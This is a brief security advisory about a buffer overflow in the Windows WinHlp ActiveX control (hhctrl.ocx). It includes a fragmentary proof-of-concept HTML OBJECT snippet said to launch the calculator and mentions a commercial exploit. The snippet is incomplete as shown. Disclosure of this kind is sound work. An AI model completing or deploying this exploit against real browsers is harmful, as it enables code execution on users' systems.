Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
The following proof-of-concept code will open the calculator on the client system:
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.